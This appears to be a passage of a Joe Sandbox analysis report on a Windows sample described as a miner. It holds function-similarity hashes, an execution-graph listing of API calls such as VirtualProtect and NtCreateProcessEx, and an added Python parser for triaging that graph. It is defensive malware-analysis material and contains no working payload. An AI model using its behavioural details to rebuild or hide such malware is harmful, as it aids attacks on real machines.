                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                        • Instruction ID: dfbb25afb583f0f7ebf3de71f6d739923476153ea30ee361d73b79b3d31d481c
                                                        • Opcode Fuzzy Hash: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                        • Instruction Fuzzy Hash: 9BF0C812E28E8582E6119F25ED490BDA361EB49BC2F509231DECDD3652EF1CF5818340

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 3592c698fd96db414e18d9b1a955536c8f084f27075795ee67145d81e77bf88e
                                                        • Instruction ID: f9dc10b0f2c6fd72c01b85e40e490fbcbe1bfa69e81dda13f2f0ce032ed562bb
                                                        • Opcode Fuzzy Hash: 3592c698fd96db414e18d9b1a955536c8f084f27075795ee67145d81e77bf88e
                                                        • Instruction Fuzzy Hash: 47011E25B29E0282E6568F01ED082381260BF04F92F450031DE8DC3EA5FF7CBD928794
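Joe Sandbox renders its control-flow and execution graphs from a flat token listing: an integer node id followed by an address or address range, optional API names, collapsed callee summaries such as "4 API calls", "call <addr>" for direct calls, and "src->dst" edges. The parser below is an added example written for this page, not part of the Joe Sandbox report or its IDA plugin; the token rules are my reading of the listings shown here, and the function names are mine. It rebuilds the graph and answers the triage question the raw listing hides: which imported APIs are reachable from a given root. The embedded samples are stitched from this section's own listings (the start-up chain from node 2488, the VirtualProtect chain from node 3872, and the fprintf function's control-flow graph). Much of what those chains reach is compiler runtime rather than sample logic: the "Unknown pseudo relocation bit size %d." and "_matherr(): %s in %s(%g, %g) (retval=%g)" strings in the function dumps above match the MinGW-w64 CRT's pseudo-relocation fix-up and _matherr handler, so a reachable-API view separates runtime plumbing from the miner's own behaviour faster than reading block by block.

```python
import re
from collections import defaultdict, deque

# Token rules (my reading of the Joe Sandbox listing format, not a documented schema):
#   "<id> <addr>"        node; addr is a 64-bit hex address or "<addr>-<addr>" range
#   "<n> API calls"      collapsed summary of a callee, attached to the current node
#   "call <addr>"        direct call to another function, attached to the current node
#   "<src>-><dst>"       edge between node ids
#   anything else        an API / function name attached to the current node
ADDR_RE = re.compile(r"^[0-9a-f]{6,16}(?:-[0-9a-f]{6,16})?$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_graph(text):
    """Parse a control_flow_graph / execution_graph listing.

    Returns (nodes, edges): nodes maps id -> {"addr", "apis", "summary"},
    edges maps id -> set of successor ids."""
    tokens = text.split()
    if tokens and not tokens[0].isdigit():      # drop the leading graph label
        tokens = tokens[1:]
    nodes, edges = {}, defaultdict(set)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        edge = EDGE_RE.match(tok)
        if edge:
            edges[int(edge.group(1))].add(int(edge.group(2)))
            i += 1
        elif tok.isdigit() and ADDR_RE.match(nxt):
            current = int(tok)
            nodes[current] = {"addr": nxt, "apis": [], "summary": None}
            i += 2
        elif tok.isdigit() and nxt == "API" and tokens[i + 2:i + 3] == ["calls"]:
            if current is not None:
                nodes[current]["summary"] = f"{tok} API calls"
            i += 3
        elif tok == "call" and ADDR_RE.match(nxt):
            if current is not None:
                nodes[current]["apis"].append(f"call {nxt}")
            i += 2
        else:
            if current is not None:
                nodes[current]["apis"].append(tok)
            i += 1
    return nodes, edges


def reachable_apis(nodes, edges, root):
    """Breadth-first walk from root; sorted set of API names on reachable nodes."""
    seen, queue, apis = {root}, deque([root]), set()
    while queue:
        n = queue.popleft()
        apis.update(nodes.get(n, {}).get("apis", ()))
        for dst in edges.get(n, ()):
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return sorted(apis)


def apis_from_root(text, root):
    """Parse the listing and list the APIs reachable from the given node id."""
    nodes, edges = parse_graph(text)
    return reachable_apis(nodes, edges, root)


# Constructed sample: tokens stitched from this report's execution_graph listing
# (start-up chain rooted at node 2488, VirtualProtect chain rooted at node 3872).
EXEC_SAMPLE = (
    "execution_graph 2488 7ff759bf1140 2491 7ff759bf1160 2488->2491 2490 7ff759bf1156 "
    "2492 7ff759bf118b 2491->2492 2493 7ff759bf11b9 2491->2493 2492->2493 "
    "2496 7ff759bf1190 2492->2496 2494 7ff759bf11d3 2493->2494 "
    "2495 7ff759bf11c7 _amsg_exit 2493->2495 2498 7ff759bf1201 _initterm 2494->2498 "
    "2499 7ff759bf121a 2494->2499 2495->2494 2496->2493 2497 7ff759bf11a0 Sleep "
    "2496->2497 2497->2493 2497->2496 2498->2499 2516 7ff759bf1880 2499->2516 "
    "2501 7ff759bf1247 SetUnhandledExceptionFilter 2502 7ff759bf126a 2501->2502 "
    "2503 7ff759bf126f malloc 2502->2503 2517 7ff759bf18a2 2516->2517 "
    "2522 7ff759bf1a0f 2516->2522 2522->2501 "
    "3872 7ff759bf1ac3 3873 7ff759bf199e 3872->3873 3874 7ff759bf1b36 3873->3874 "
    "3876 7ff759bf19e9 VirtualProtect 3873->3876 3877 7ff759bf1a0f 3873->3877 "
    "3875 7ff759bf1ba0 4 API calls 3874->3875 3875->3877 3876->3873"
)

# Constructed sample: the _matherr function's control_flow_graph from this report.
CFG_SAMPLE = (
    "control_flow_graph 698 7ff6c5321800-7ff6c5321810 699 7ff6c5321812-7ff6c5321822 "
    "698->699 700 7ff6c5321824 698->700 701 7ff6c532182b-7ff6c5321867 "
    "call 7ff6c5322290 fprintf 699->701 700->701"
)

if __name__ == "__main__":
    for label, text, root in (("start-up", EXEC_SAMPLE, 2488),
                              ("pseudo-reloc", EXEC_SAMPLE, 3872),
                              ("_matherr", CFG_SAMPLE, 698)):
        print(label, apis_from_root(text, root))
```

Run against the full listing, the same walk from 7ff759bf1140 surfaces the SetUnhandledExceptionFilter, VirtualProtect and critical-section helpers as runtime start-up, leaving the wcs* string-building chain under 7ff759bf3d60 as the part worth reversing by hand.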

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1348
                                                        Total number of Limit Nodes:2
                                                        execution_graph (rendered graph omitted; the node/edge listing that followed is summarised here). Entry chain: 7ff759bf1140 -> 7ff759bf1160 (CRT start-up: Sleep loop, _amsg_exit, _initterm, the 7ff759bf1880 pseudo-relocation fix-up using VirtualQuery, VirtualProtect, memcpy and GetLastError, SetUnhandledExceptionFilter, malloc/strlen/memcpy, _cexit) -> 7ff759bf3b50 -> 7ff759bf3d60, which builds and compares wide-character strings with memset, wcscpy, wcscat, wcslen, _wcsnicmp, _wcsicmp and memcpy, calling helpers at 7ff759bf1394 (2 API calls each, names not shown, chained dozens of times), 7ff759bf2df0 and 7ff759bf38e0 (11 API calls each), 7ff759bf3350 (memset) and 7ff759bf2f70. Other roots: 7ff759bf2104 (EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsGetValue, GetLastError, free), 7ff759bf1ac3 (VirtualProtect, plus the 7ff759bf1ba0 helper with 4 API calls) and 7ff759bf1e65 (signal). Addresses here are relative to image base 7ff759bf0000 rather than the 7ff6c5320000 base of the function dumps above.
3163->3164 3165 7ff759bf156c 3164->3165 3166 7ff759bf1394 2 API calls 3165->3166 3167 7ff759bf157b 3166->3167 3168 7ff759bf1394 2 API calls 3167->3168 3169 7ff759bf158a 3168->3169 3170 7ff759bf1394 2 API calls 3169->3170 3171 7ff759bf1599 3170->3171 3172 7ff759bf1394 2 API calls 3171->3172 3173 7ff759bf15a8 3172->3173 3174 7ff759bf1394 2 API calls 3173->3174 3175 7ff759bf15b7 3174->3175 3176 7ff759bf1394 2 API calls 3175->3176 3177 7ff759bf15c6 3176->3177 3178 7ff759bf1394 2 API calls 3177->3178 3179 7ff759bf15d5 3178->3179 3180 7ff759bf15e4 3179->3180 3181 7ff759bf1394 2 API calls 3179->3181 3182 7ff759bf1394 2 API calls 3180->3182 3181->3180 3183 7ff759bf15f3 3182->3183 3183->2643 3183->2656 3185 7ff759bf35c1 memset 3184->3185 3195 7ff759bf33c3 3184->3195 3186 7ff759bf35e6 3185->3186 3188 7ff759bf362b wcscpy wcscat wcslen 3186->3188 3187 7ff759bf343a memset 3187->3195 3189 7ff759bf1422 2 API calls 3188->3189 3191 7ff759bf3728 3189->3191 3190 7ff759bf3493 wcscpy wcscat wcslen 3447 7ff759bf1422 3190->3447 3193 7ff759bf3767 3191->3193 3516 7ff759bf1431 3191->3516 3200 7ff759bf14c7 3193->3200 3195->3185 3195->3187 3195->3190 3197 7ff759bf145e 2 API calls 3195->3197 3199 7ff759bf3579 3195->3199 3197->3195 3198 7ff759bf145e 2 API calls 3198->3193 3199->3185 3201 7ff759bf1394 2 API calls 3200->3201 3202 7ff759bf14d6 3201->3202 3203 7ff759bf14e5 3202->3203 3204 7ff759bf1394 2 API calls 3202->3204 3205 7ff759bf1394 2 API calls 3203->3205 3204->3203 3206 7ff759bf14ef 3205->3206 3207 7ff759bf14f4 3206->3207 3208 7ff759bf1394 2 API calls 3206->3208 3209 7ff759bf1394 2 API calls 3207->3209 3208->3207 3210 7ff759bf14fe 3209->3210 3211 7ff759bf1503 3210->3211 3212 7ff759bf1394 2 API calls 3210->3212 3213 7ff759bf1394 2 API calls 3211->3213 3212->3211 3214 7ff759bf150d 3213->3214 3215 7ff759bf1394 2 API calls 3214->3215 3216 7ff759bf1512 3215->3216 3217 7ff759bf1394 2 API calls 3216->3217 3218 7ff759bf1521 3217->3218 3219 7ff759bf1394 2 API calls 3218->3219 3220 7ff759bf1530 
3219->3220 3221 7ff759bf1394 2 API calls 3220->3221 3222 7ff759bf153f 3221->3222 3223 7ff759bf1394 2 API calls 3222->3223 3224 7ff759bf154e 3223->3224 3225 7ff759bf1394 2 API calls 3224->3225 3226 7ff759bf155d 3225->3226 3227 7ff759bf1394 2 API calls 3226->3227 3228 7ff759bf156c 3227->3228 3229 7ff759bf1394 2 API calls 3228->3229 3230 7ff759bf157b 3229->3230 3231 7ff759bf1394 2 API calls 3230->3231 3232 7ff759bf158a 3231->3232 3233 7ff759bf1394 2 API calls 3232->3233 3234 7ff759bf1599 3233->3234 3235 7ff759bf1394 2 API calls 3234->3235 3236 7ff759bf15a8 3235->3236 3237 7ff759bf1394 2 API calls 3236->3237 3238 7ff759bf15b7 3237->3238 3239 7ff759bf1394 2 API calls 3238->3239 3240 7ff759bf15c6 3239->3240 3241 7ff759bf1394 2 API calls 3240->3241 3242 7ff759bf15d5 3241->3242 3243 7ff759bf15e4 3242->3243 3244 7ff759bf1394 2 API calls 3242->3244 3245 7ff759bf1394 2 API calls 3243->3245 3244->3243 3246 7ff759bf15f3 3245->3246 3246->2672 3248 7ff759bf2f88 3247->3248 3249 7ff759bf14a9 2 API calls 3248->3249 3250 7ff759bf2fd0 3249->3250 3250->2644 3252 7ff759bf2690 10 API calls 3251->3252 3253 7ff759bf391e 3252->3253 3254 7ff759bf3b21 3253->3254 3255 7ff759bf14a9 2 API calls 3253->3255 3254->2657 3256 7ff759bf3967 3255->3256 3257 7ff759bf3b28 3256->3257 3583 7ff759bf14b8 3256->3583 3802 7ff759bf15c6 3257->3802 3260 7ff759bf398f 3261 7ff759bf3a87 memset 3260->3261 3263 7ff759bf14b8 2 API calls 3260->3263 3632 7ff759bf15d5 3260->3632 3637 7ff759bf148b 3261->3637 3263->3260 3268 7ff759bf14b8 2 API calls 3269 7ff759bf3b07 3268->3269 3269->3257 3270 7ff759bf3b0b 3269->3270 3745 7ff759bf147c 3270->3745 3273 7ff759bf145e 2 API calls 3273->3254 3275 7ff759bf83f0 malloc 3274->3275 3276 7ff759bf13b8 3275->3276 3277 7ff759bf13c6 NtCreateProcessEx 3276->3277 3277->2713 3279 7ff759bf266f 3278->3279 3279->2853 3279->3279 3344 7ff759bf155d 3280->3344 3282 7ff759bf27f4 3283 7ff759bf14c7 2 API calls 3282->3283 3284 7ff759bf2816 3283->3284 3288 7ff759bf1503 2 API calls 3284->3288 3285 
7ff759bf2785 wcsncmp 3365 7ff759bf14e5 3285->3365 3289 7ff759bf283d 3288->3289 3291 7ff759bf2847 memset 3289->3291 3290 7ff759bf2d27 3292 7ff759bf2877 3291->3292 3293 7ff759bf28bc wcscpy wcscat wcslen 3292->3293 3294 7ff759bf28ee wcslen 3293->3294 3295 7ff759bf291a 3293->3295 3294->3295 3296 7ff759bf2967 wcslen 3295->3296 3298 7ff759bf2985 3295->3298 3296->3298 3297 7ff759bf29d9 wcslen 3299 7ff759bf14a9 2 API calls 3297->3299 3298->3290 3298->3297 3300 7ff759bf2a73 3299->3300 3301 7ff759bf14a9 2 API calls 3300->3301 3302 7ff759bf2bd2 3301->3302 3408 7ff759bf14f4 3302->3408 3305 7ff759bf14c7 2 API calls 3306 7ff759bf2c99 3305->3306 3307 7ff759bf14c7 2 API calls 3306->3307 3308 7ff759bf2cb1 3307->3308 3309 7ff759bf145e 2 API calls 3308->3309 3310 7ff759bf2cbb 3309->3310 3311 7ff759bf145e 2 API calls 3310->3311 3312 7ff759bf2cc5 3311->3312 3312->2856 3314 7ff759bf1394 2 API calls 3313->3314 3315 7ff759bf1521 3314->3315 3316 7ff759bf1394 2 API calls 3315->3316 3317 7ff759bf1530 3316->3317 3318 7ff759bf1394 2 API calls 3317->3318 3319 7ff759bf153f 3318->3319 3320 7ff759bf1394 2 API calls 3319->3320 3321 7ff759bf154e 3320->3321 3322 7ff759bf1394 2 API calls 3321->3322 3323 7ff759bf155d 3322->3323 3324 7ff759bf1394 2 API calls 3323->3324 3325 7ff759bf156c 3324->3325 3326 7ff759bf1394 2 API calls 3325->3326 3327 7ff759bf157b 3326->3327 3328 7ff759bf1394 2 API calls 3327->3328 3329 7ff759bf158a 3328->3329 3330 7ff759bf1394 2 API calls 3329->3330 3331 7ff759bf1599 3330->3331 3332 7ff759bf1394 2 API calls 3331->3332 3333 7ff759bf15a8 3332->3333 3334 7ff759bf1394 2 API calls 3333->3334 3335 7ff759bf15b7 3334->3335 3336 7ff759bf1394 2 API calls 3335->3336 3337 7ff759bf15c6 3336->3337 3338 7ff759bf1394 2 API calls 3337->3338 3339 7ff759bf15d5 3338->3339 3340 7ff759bf15e4 3339->3340 3341 7ff759bf1394 2 API calls 3339->3341 3342 7ff759bf1394 2 API calls 3340->3342 3341->3340 3343 7ff759bf15f3 3342->3343 3343->2858 3345 7ff759bf1394 2 API calls 3344->3345 3346 7ff759bf156c 
3345->3346 3347 7ff759bf1394 2 API calls 3346->3347 3348 7ff759bf157b 3347->3348 3349 7ff759bf1394 2 API calls 3348->3349 3350 7ff759bf158a 3349->3350 3351 7ff759bf1394 2 API calls 3350->3351 3352 7ff759bf1599 3351->3352 3353 7ff759bf1394 2 API calls 3352->3353 3354 7ff759bf15a8 3353->3354 3355 7ff759bf1394 2 API calls 3354->3355 3356 7ff759bf15b7 3355->3356 3357 7ff759bf1394 2 API calls 3356->3357 3358 7ff759bf15c6 3357->3358 3359 7ff759bf1394 2 API calls 3358->3359 3360 7ff759bf15d5 3359->3360 3361 7ff759bf15e4 3360->3361 3362 7ff759bf1394 2 API calls 3360->3362 3363 7ff759bf1394 2 API calls 3361->3363 3362->3361 3364 7ff759bf15f3 3363->3364 3364->3282 3364->3285 3364->3290 3366 7ff759bf1394 2 API calls 3365->3366 3367 7ff759bf14ef 3366->3367 3368 7ff759bf14f4 3367->3368 3369 7ff759bf1394 2 API calls 3367->3369 3370 7ff759bf1394 2 API calls 3368->3370 3369->3368 3371 7ff759bf14fe 3370->3371 3372 7ff759bf1503 3371->3372 3373 7ff759bf1394 2 API calls 3371->3373 3374 7ff759bf1394 2 API calls 3372->3374 3373->3372 3375 7ff759bf150d 3374->3375 3376 7ff759bf1394 2 API calls 3375->3376 3377 7ff759bf1512 3376->3377 3378 7ff759bf1394 2 API calls 3377->3378 3379 7ff759bf1521 3378->3379 3380 7ff759bf1394 2 API calls 3379->3380 3381 7ff759bf1530 3380->3381 3382 7ff759bf1394 2 API calls 3381->3382 3383 7ff759bf153f 3382->3383 3384 7ff759bf1394 2 API calls 3383->3384 3385 7ff759bf154e 3384->3385 3386 7ff759bf1394 2 API calls 3385->3386 3387 7ff759bf155d 3386->3387 3388 7ff759bf1394 2 API calls 3387->3388 3389 7ff759bf156c 3388->3389 3390 7ff759bf1394 2 API calls 3389->3390 3391 7ff759bf157b 3390->3391 3392 7ff759bf1394 2 API calls 3391->3392 3393 7ff759bf158a 3392->3393 3394 7ff759bf1394 2 API calls 3393->3394 3395 7ff759bf1599 3394->3395 3396 7ff759bf1394 2 API calls 3395->3396 3397 7ff759bf15a8 3396->3397 3398 7ff759bf1394 2 API calls 3397->3398 3399 7ff759bf15b7 3398->3399 3400 7ff759bf1394 2 API calls 3399->3400 3401 7ff759bf15c6 3400->3401 3402 7ff759bf1394 2 API calls 
3401->3402 3403 7ff759bf15d5 3402->3403 3404 7ff759bf15e4 3403->3404 3405 7ff759bf1394 2 API calls 3403->3405 3406 7ff759bf1394 2 API calls 3404->3406 3405->3404 3407 7ff759bf15f3 3406->3407 3407->3282 3409 7ff759bf1394 2 API calls 3408->3409 3410 7ff759bf14fe 3409->3410 3411 7ff759bf1503 3410->3411 3412 7ff759bf1394 2 API calls 3410->3412 3413 7ff759bf1394 2 API calls 3411->3413 3412->3411 3414 7ff759bf150d 3413->3414 3415 7ff759bf1394 2 API calls 3414->3415 3416 7ff759bf1512 3415->3416 3417 7ff759bf1394 2 API calls 3416->3417 3418 7ff759bf1521 3417->3418 3419 7ff759bf1394 2 API calls 3418->3419 3420 7ff759bf1530 3419->3420 3421 7ff759bf1394 2 API calls 3420->3421 3422 7ff759bf153f 3421->3422 3423 7ff759bf1394 2 API calls 3422->3423 3424 7ff759bf154e 3423->3424 3425 7ff759bf1394 2 API calls 3424->3425 3426 7ff759bf155d 3425->3426 3427 7ff759bf1394 2 API calls 3426->3427 3428 7ff759bf156c 3427->3428 3429 7ff759bf1394 2 API calls 3428->3429 3430 7ff759bf157b 3429->3430 3431 7ff759bf1394 2 API calls 3430->3431 3432 7ff759bf158a 3431->3432 3433 7ff759bf1394 2 API calls 3432->3433 3434 7ff759bf1599 3433->3434 3435 7ff759bf1394 2 API calls 3434->3435 3436 7ff759bf15a8 3435->3436 3437 7ff759bf1394 2 API calls 3436->3437 3438 7ff759bf15b7 3437->3438 3439 7ff759bf1394 2 API calls 3438->3439 3440 7ff759bf15c6 3439->3440 3441 7ff759bf1394 2 API calls 3440->3441 3442 7ff759bf15d5 3441->3442 3443 7ff759bf15e4 3442->3443 3444 7ff759bf1394 2 API calls 3442->3444 3445 7ff759bf1394 2 API calls 3443->3445 3444->3443 3446 7ff759bf15f3 3445->3446 3446->3305 3448 7ff759bf1394 2 API calls 3447->3448 3449 7ff759bf1431 3448->3449 3450 7ff759bf1394 2 API calls 3449->3450 3451 7ff759bf1440 3450->3451 3452 7ff759bf1394 2 API calls 3451->3452 3453 7ff759bf144f 3452->3453 3454 7ff759bf1394 2 API calls 3453->3454 3455 7ff759bf145e 3454->3455 3456 7ff759bf1394 2 API calls 3455->3456 3457 7ff759bf146d 3456->3457 3458 7ff759bf1394 2 API calls 3457->3458 3459 7ff759bf147c 3458->3459 3460 
7ff759bf1394 2 API calls 3459->3460 3461 7ff759bf148b 3460->3461 3462 7ff759bf1394 2 API calls 3461->3462 3463 7ff759bf149a 3462->3463 3464 7ff759bf1394 2 API calls 3463->3464 3465 7ff759bf14a9 3464->3465 3466 7ff759bf1394 2 API calls 3465->3466 3467 7ff759bf14b8 3466->3467 3468 7ff759bf1394 2 API calls 3467->3468 3469 7ff759bf14c7 3468->3469 3470 7ff759bf1394 2 API calls 3469->3470 3471 7ff759bf14d6 3470->3471 3472 7ff759bf14e5 3471->3472 3473 7ff759bf1394 2 API calls 3471->3473 3474 7ff759bf1394 2 API calls 3472->3474 3473->3472 3475 7ff759bf14ef 3474->3475 3476 7ff759bf14f4 3475->3476 3477 7ff759bf1394 2 API calls 3475->3477 3478 7ff759bf1394 2 API calls 3476->3478 3477->3476 3479 7ff759bf14fe 3478->3479 3480 7ff759bf1503 3479->3480 3481 7ff759bf1394 2 API calls 3479->3481 3482 7ff759bf1394 2 API calls 3480->3482 3481->3480 3483 7ff759bf150d 3482->3483 3484 7ff759bf1394 2 API calls 3483->3484 3485 7ff759bf1512 3484->3485 3486 7ff759bf1394 2 API calls 3485->3486 3487 7ff759bf1521 3486->3487 3488 7ff759bf1394 2 API calls 3487->3488 3489 7ff759bf1530 3488->3489 3490 7ff759bf1394 2 API calls 3489->3490 3491 7ff759bf153f 3490->3491 3492 7ff759bf1394 2 API calls 3491->3492 3493 7ff759bf154e 3492->3493 3494 7ff759bf1394 2 API calls 3493->3494 3495 7ff759bf155d 3494->3495 3496 7ff759bf1394 2 API calls 3495->3496 3497 7ff759bf156c 3496->3497 3498 7ff759bf1394 2 API calls 3497->3498 3499 7ff759bf157b 3498->3499 3500 7ff759bf1394 2 API calls 3499->3500 3501 7ff759bf158a 3500->3501 3502 7ff759bf1394 2 API calls 3501->3502 3503 7ff759bf1599 3502->3503 3504 7ff759bf1394 2 API calls 3503->3504 3505 7ff759bf15a8 3504->3505 3506 7ff759bf1394 2 API calls 3505->3506 3507 7ff759bf15b7 3506->3507 3508 7ff759bf1394 2 API calls 3507->3508 3509 7ff759bf15c6 3508->3509 3510 7ff759bf1394 2 API calls 3509->3510 3511 7ff759bf15d5 3510->3511 3512 7ff759bf15e4 3511->3512 3513 7ff759bf1394 2 API calls 3511->3513 3514 7ff759bf1394 2 API calls 3512->3514 3513->3512 3515 7ff759bf15f3 3514->3515 
3515->3195 3517 7ff759bf1394 2 API calls 3516->3517 3518 7ff759bf1440 3517->3518 3519 7ff759bf1394 2 API calls 3518->3519 3520 7ff759bf144f 3519->3520 3521 7ff759bf1394 2 API calls 3520->3521 3522 7ff759bf145e 3521->3522 3523 7ff759bf1394 2 API calls 3522->3523 3524 7ff759bf146d 3523->3524 3525 7ff759bf1394 2 API calls 3524->3525 3526 7ff759bf147c 3525->3526 3527 7ff759bf1394 2 API calls 3526->3527 3528 7ff759bf148b 3527->3528 3529 7ff759bf1394 2 API calls 3528->3529 3530 7ff759bf149a 3529->3530 3531 7ff759bf1394 2 API calls 3530->3531 3532 7ff759bf14a9 3531->3532 3533 7ff759bf1394 2 API calls 3532->3533 3534 7ff759bf14b8 3533->3534 3535 7ff759bf1394 2 API calls 3534->3535 3536 7ff759bf14c7 3535->3536 3537 7ff759bf1394 2 API calls 3536->3537 3538 7ff759bf14d6 3537->3538 3539 7ff759bf14e5 3538->3539 3540 7ff759bf1394 2 API calls 3538->3540 3541 7ff759bf1394 2 API calls 3539->3541 3540->3539 3542 7ff759bf14ef 3541->3542 3543 7ff759bf14f4 3542->3543 3544 7ff759bf1394 2 API calls 3542->3544 3545 7ff759bf1394 2 API calls 3543->3545 3544->3543 3546 7ff759bf14fe 3545->3546 3547 7ff759bf1503 3546->3547 3548 7ff759bf1394 2 API calls 3546->3548 3549 7ff759bf1394 2 API calls 3547->3549 3548->3547 3550 7ff759bf150d 3549->3550 3551 7ff759bf1394 2 API calls 3550->3551 3552 7ff759bf1512 3551->3552 3553 7ff759bf1394 2 API calls 3552->3553 3554 7ff759bf1521 3553->3554 3555 7ff759bf1394 2 API calls 3554->3555 3556 7ff759bf1530 3555->3556 3557 7ff759bf1394 2 API calls 3556->3557 3558 7ff759bf153f 3557->3558 3559 7ff759bf1394 2 API calls 3558->3559 3560 7ff759bf154e 3559->3560 3561 7ff759bf1394 2 API calls 3560->3561 3562 7ff759bf155d 3561->3562 3563 7ff759bf1394 2 API calls 3562->3563 3564 7ff759bf156c 3563->3564 3565 7ff759bf1394 2 API calls 3564->3565 3566 7ff759bf157b 3565->3566 3567 7ff759bf1394 2 API calls 3566->3567 3568 7ff759bf158a 3567->3568 3569 7ff759bf1394 2 API calls 3568->3569 3570 7ff759bf1599 3569->3570 3571 7ff759bf1394 2 API calls 3570->3571 3572 7ff759bf15a8 
3571->3572 3573 7ff759bf1394 2 API calls 3572->3573 3574 7ff759bf15b7 3573->3574 3575 7ff759bf1394 2 API calls 3574->3575 3576 7ff759bf15c6 3575->3576 3577 7ff759bf1394 2 API calls 3576->3577 3578 7ff759bf15d5 3577->3578 3579 7ff759bf15e4 3578->3579 3580 7ff759bf1394 2 API calls 3578->3580 3581 7ff759bf1394 2 API calls 3579->3581 3580->3579 3582 7ff759bf15f3 3581->3582 3582->3198 3584 7ff759bf1394 2 API calls 3583->3584 3585 7ff759bf14c7 3584->3585 3586 7ff759bf1394 2 API calls 3585->3586 3587 7ff759bf14d6 3586->3587 3588 7ff759bf14e5 3587->3588 3589 7ff759bf1394 2 API calls 3587->3589 3590 7ff759bf1394 2 API calls 3588->3590 3589->3588 3591 7ff759bf14ef 3590->3591 3592 7ff759bf14f4 3591->3592 3593 7ff759bf1394 2 API calls 3591->3593 3594 7ff759bf1394 2 API calls 3592->3594 3593->3592 3595 7ff759bf14fe 3594->3595 3596 7ff759bf1503 3595->3596 3597 7ff759bf1394 2 API calls 3595->3597 3598 7ff759bf1394 2 API calls 3596->3598 3597->3596 3599 7ff759bf150d 3598->3599 3600 7ff759bf1394 2 API calls 3599->3600 3601 7ff759bf1512 3600->3601 3602 7ff759bf1394 2 API calls 3601->3602 3603 7ff759bf1521 3602->3603 3604 7ff759bf1394 2 API calls 3603->3604 3605 7ff759bf1530 3604->3605 3606 7ff759bf1394 2 API calls 3605->3606 3607 7ff759bf153f 3606->3607 3608 7ff759bf1394 2 API calls 3607->3608 3609 7ff759bf154e 3608->3609 3610 7ff759bf1394 2 API calls 3609->3610 3611 7ff759bf155d 3610->3611 3612 7ff759bf1394 2 API calls 3611->3612 3613 7ff759bf156c 3612->3613 3614 7ff759bf1394 2 API calls 3613->3614 3615 7ff759bf157b 3614->3615 3616 7ff759bf1394 2 API calls 3615->3616 3617 7ff759bf158a 3616->3617 3618 7ff759bf1394 2 API calls 3617->3618 3619 7ff759bf1599 3618->3619 3620 7ff759bf1394 2 API calls 3619->3620 3621 7ff759bf15a8 3620->3621 3622 7ff759bf1394 2 API calls 3621->3622 3623 7ff759bf15b7 3622->3623 3624 7ff759bf1394 2 API calls 3623->3624 3625 7ff759bf15c6 3624->3625 3626 7ff759bf1394 2 API calls 3625->3626 3627 7ff759bf15d5 3626->3627 3628 7ff759bf15e4 3627->3628 3629 
7ff759bf1394 2 API calls 3627->3629 3630 7ff759bf1394 2 API calls 3628->3630 3629->3628 3631 7ff759bf15f3 3630->3631 3631->3260 3633 7ff759bf15e4 3632->3633 3634 7ff759bf1394 2 API calls 3632->3634 3635 7ff759bf1394 2 API calls 3633->3635 3634->3633 3636 7ff759bf15f3 3635->3636 3636->3260 3638 7ff759bf1394 2 API calls 3637->3638 3639 7ff759bf149a 3638->3639 3640 7ff759bf1394 2 API calls 3639->3640 3641 7ff759bf14a9 3640->3641 3642 7ff759bf1394 2 API calls 3641->3642 3643 7ff759bf14b8 3642->3643 3644 7ff759bf1394 2 API calls 3643->3644 3645 7ff759bf14c7 3644->3645 3646 7ff759bf1394 2 API calls 3645->3646 3647 7ff759bf14d6 3646->3647 3648 7ff759bf14e5 3647->3648 3649 7ff759bf1394 2 API calls 3647->3649 3650 7ff759bf1394 2 API calls 3648->3650 3649->3648 3651 7ff759bf14ef 3650->3651 3652 7ff759bf14f4 3651->3652 3653 7ff759bf1394 2 API calls 3651->3653 3654 7ff759bf1394 2 API calls 3652->3654 3653->3652 3655 7ff759bf14fe 3654->3655 3656 7ff759bf1503 3655->3656 3657 7ff759bf1394 2 API calls 3655->3657 3658 7ff759bf1394 2 API calls 3656->3658 3657->3656 3659 7ff759bf150d 3658->3659 3660 7ff759bf1394 2 API calls 3659->3660 3661 7ff759bf1512 3660->3661 3662 7ff759bf1394 2 API calls 3661->3662 3663 7ff759bf1521 3662->3663 3664 7ff759bf1394 2 API calls 3663->3664 3665 7ff759bf1530 3664->3665 3666 7ff759bf1394 2 